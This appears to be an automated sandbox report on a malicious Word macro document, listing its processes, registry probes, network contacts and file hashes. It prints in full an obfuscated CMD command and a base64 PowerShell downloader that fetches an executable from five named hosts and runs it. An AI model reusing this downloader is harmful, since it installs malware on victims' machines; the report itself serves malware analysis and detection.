powershell -e JAByAEYAWgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSAG0ARgA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYwBoAGkAZwBhAG4AYgB1AHMAaQBuAGUAcwBzAC4AdQBzAC8AagBCAEUANgBAAGgAdAB0AHAAOgAvAC8AaQBuAGcAcgBpAGQAawBhAHMAbABpAGsALgBjAG8AbQAvADgAQABoAHQAdABwADoALwAvAGQAcgBkAGUAbABhAGwAdQB6AC4AYwBvAG0ALwBRADcAcwAxAEAAaAB0AHQAcAA6AC8ALwBtAGkAbABlAGgAaQBnAGgAZgBmAGEALgBjAG8AbQAvAGMAcQBaAEgATwAwADEAVgBAAGgAdAB0AHAAOgAvAC8AYQB2AHQAbwAtAGIAYQBrAGkALgByAHUALwBQAGgAOQBqACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABpAEMAdwAgAD0AIAAnADYAOAAwACcAOwAkAGoARgBVAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAGkAQwB3ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJAB3AE8AaAAgAGkAbgAgACQAUgBtAEYAKQB7AHQAcgB5AHsAJAByAEYAWgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB3AE8AaAAsACAAJABqAEYAVQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABqAEYAVQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | michiganbusiness.us | udp |
| US | 103.224.212.213:80 | michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ww38.michiganbusiness.us | udp |
| US | 76.223.26.96:80 | ww38.michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ingridkaslik.com | udp |
| US | 52.40.237.158:80 | ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | www.ingridkaslik.com | udp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | drdelaluz.com | udp |
| US | 8.8.8.8:53 | milehighffa.com | udp |
| US | 107.180.119.205:80 | milehighffa.com | tcp |
| US | 8.8.8.8:53 | avto-baki.ru | udp |
| US | 172.67.167.121:80 | avto-baki.ru | tcp |
| US | 172.67.167.121:443 | avto-baki.ru | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
Files
memory/2232-0-0x000000002FB11000-0x000000002FB12000-memory.dmp
memory/2232-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2232-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp
memory/2232-6-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-19-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-20-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-41-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-30-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-25-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-14-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-13-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-12-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-11-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-10-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-9-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-35-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-7-0x00000000005F0000-0x00000000006F0000-memory.dmp
memory/2232-48-0x0000000070CFD000-0x0000000070D08000-memory.dmp
memory/2232-49-0x00000000005F0000-0x00000000006F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab9E25.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar9F8F.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e12a317f3dcefc68332ae3d93f73c24d |
| SHA1 | 1c8bd4a35d95b8eed6de082038a4dadce2d93b70 |
| SHA256 | bbf30dbeb15ee9c50d0be93f8890a980fded58335623be16e8da2984e9f7a90d |
| SHA512 | 346232d18c15ab0a5afa61c5139d6d48a83dc950282ba27559340357bd07c4a952f4be18278d479f45fdf833d78a892ede777c94a3ed38b9767971c09636201d |
memory/2232-125-0x000000005FFF0000-0x0000000060000000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 46a497f87cdefd74874806d6e224942e |
| SHA1 | 38bb5573eac2e76fd3a7b9a36fb086c591ed21f3 |
| SHA256 | 4d501b6fd59a960c6bc07be0b00083903bea388d76a18fe8ed33a1aad0b57781 |
| SHA512 | 3bd381f8e8933068ce664f33c1224723404f0e778dff86da243b3b0906feb2b5155c1956f09b902610f53277b3241269a5c2646eb583084e320b4cd5c69cda8e |
memory/2232-126-0x0000000070CFD000-0x0000000070D08000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 14:00
Reported
2024-05-26 14:07
Platform
win10v2004-20240508-en
Max time kernel
130s
Max time network
150s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\CMD.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 1748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMD.exe |
| PID 1648 wrote to memory of 1748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMD.exe |
| PID 1748 wrote to memory of 4624 | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1748 wrote to memory of 4624 | N/A | C:\Windows\SYSTEM32\CMD.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\75b5887bf105e8c270a980a1122802d3_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\CMD.exe
CMD /v^ /R" ^S^E^t ^ ^ ^B^W^k^q==^A^AI^A^ACAg^AAIAAC^A^gAA^I^A^AC^A^g^AA^I^A^ACA^g^A^A^IAAC^Ag^AA^IAACA9^BQf^A^s^H^A^oBw^Y^A^QHAh^B^wY^A0HA^7^Aw^aAEGAlBgcA^IGA^7^A^QVAY^E^A^qB^A^JA^AC^AtB^Q^ZA^Q^HA^J^BQLAU^GArB^w^bAY^HA^u^BQSA^sDApAQVAY^EA^qB^A^JAACA^sA^A^a^A^8E^A3^B^A^JA^gCAlBAbAk^G^AGBAZA^EGAvBAbA4G^A^3^B^w^b^AQEA^uA^g^W^A^Y^E^Ay^BA^JAsHA^5^BgcAQHA7BQKAY^E^A^tB^gUA^QC^A^gAgb^Ak^G^A^g^AA^aA8^E^A^3BA^JA^gCA^oB^wYAEG^AlB^gc^A8G^A^mBw^O^AcCAl^BAe^AUG^Au^A^wJA^sC^A^3^B^wQ^A^kG^A^k^A^w^K^AcCAc^B^wJ^AsC^AjBQ^aAw^G^Ai^BQd^A^A^HA6^Ag^d^A^4^GAl^B^AJA0D^AV^B^gR^A^o^GA^kA^w^O^AcC^Aw^AA^OA^Y^DAn^A^A^IA^0^D^AgAwdA^ME^A^pB^A^JAs^DApAw^J^AAE^AnA^A^K^AQ^HA^p^BAb^A^A^HA^TBgLAcC^A^q^B^Q^OAgG^AQBw^L^A^U^H^AyB^gL^A^kGArBQ^YAI^GA^t^A^w^b^AQ^HA^2B^Q^Y^A^8CAv^AgO^AAH^A^0B^A^d^AgGA^AB^gVA^E^DAwA^w^T^AgEAaBQc^A^MGAv^AQ^b^A^8GAj^B^g^LAE^G^AmBgZ^Ag^G^AnB^Q^aA^g^GAlBAbAkG^At^B^w^L^A^8CA^6^A^Ac^AQHA^0B^Aa^AAE^AxAwcAc^D^AR^BwLA0GAv^BwY^A4CA6^BQd^AwG^A^h^B^AbAUGAk^Bgc^AQ^GAv^A^w^L^AoD^Aw^B^AdA^Q^H^A^o^BAQAgD^AvAQbA^8G^A^jB^gLA^sG^Ap^B^A^bAMHAh^Bwa^AQ^GA^pB^gcAcGA^uB^Q^a^A^8C^AvAgO^A^A^HA0BA^d^A^g^GAAB^gNAUE^AC^Bg^a^A^8CA^zBQ^dA^4C^AzBwc^AUG^Au^BQ^a^AMHA1BgYA4GA^hB^wZA^k^G^AoBwYAk^G^A^tBwL^A^8C^A^6^AAcA^QHA^0BAaAcCA^9^AgRA^0GA^SBAJ^AsD^A0Bg^b^A^UG^A^pBA^b^AM^E^AiBQZ^AcF^AuA^AdAUG^A^O^B^A^IAQH^A^jB^Q^ZAoGA^iBw^bA^0C^A^3^BQ^ZA4G^A9A^g^WAY^EAy^BA^J ^e-^ l^l^eh^srewo^p&& f^oR /^l %^e ^in ( ^921 ^-1^ ^0) ^dO s^e^t C^H=!C^H!!^B^W^k^q:~ %^e,1!&& ^I^F %^e =^=^0 C^a^LL %C^H:^~ ^ ^4% "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JAByAEYAWgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABSAG0ARgA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYwBoAGkAZwBhAG4AYgB1AHMAaQBuAGUAcwBzAC4AdQBzAC8AagBCAEUANgBAAGgAdAB0AHAAOgAvAC8AaQBuAGcAcgBpAGQAawBhAHMAbABpAGsALgBjAG8AbQAvADgAQABoAHQAdABwADoALwAvAGQAcgBkAGUAbABhAGwAdQB6AC4AYwBvAG0ALwBRADcAcwAxAEAAaAB0AHQAcAA6AC8ALwBtAGkAbABlAGgAaQBnAGgAZgBmAGEALgBjAG8AbQAvAGMAcQBaAEgATwAwADEAVgBAAGgAdAB0AHAAOgAvAC8AYQB2AHQAbwAtAGIAYQBrAGkALgByAHUALwBQAGgAOQBqACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABpAEMAdwAgAD0AIAAnADYAOAAwACcAOwAkAGoARgBVAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAGkAQwB3ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJAB3AE8AaAAgAGkAbgAgACQAUgBtAEYAKQB7AHQAcgB5AHsAJAByAEYAWgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB3AE8AaAAsACAAJABqAEYAVQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABqAEYAVQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | michiganbusiness.us | udp |
| US | 103.224.212.213:80 | michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ww38.michiganbusiness.us | udp |
| US | 13.248.148.254:80 | ww38.michiganbusiness.us | tcp |
| US | 8.8.8.8:53 | ingridkaslik.com | udp |
| US | 52.40.237.158:80 | ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | www.ingridkaslik.com | udp |
| US | 104.16.187.173:443 | www.ingridkaslik.com | tcp |
| US | 8.8.8.8:53 | 254.148.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.212.224.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.237.40.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drdelaluz.com | udp |
| US | 8.8.8.8:53 | milehighffa.com | udp |
| US | 107.180.119.205:80 | milehighffa.com | tcp |
| US | 8.8.8.8:53 | 173.187.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.11:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avto-baki.ru | udp |
| US | 172.67.167.121:80 | avto-baki.ru | tcp |
| US | 172.67.167.121:443 | avto-baki.ru | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.167.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/1648-0-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-1-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-3-0x00007FFCD90ED000-0x00007FFCD90EE000-memory.dmp
memory/1648-4-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-7-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-6-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-5-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-2-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-9-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-8-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-11-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-13-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-14-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-16-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-15-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-12-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-10-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-17-0x00007FFC96870000-0x00007FFC96880000-memory.dmp
memory/1648-18-0x00007FFC96870000-0x00007FFC96880000-memory.dmp
memory/1648-29-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-28-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-30-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upplv43i.vwf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4624-42-0x0000022609570000-0x0000022609592000-memory.dmp
memory/1648-97-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-332-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-333-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCDA838.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |
memory/1648-532-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp
memory/1648-555-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-556-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-557-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-554-0x00007FFC990D0000-0x00007FFC990E0000-memory.dmp
memory/1648-558-0x00007FFCD9050000-0x00007FFCD9245000-memory.dmp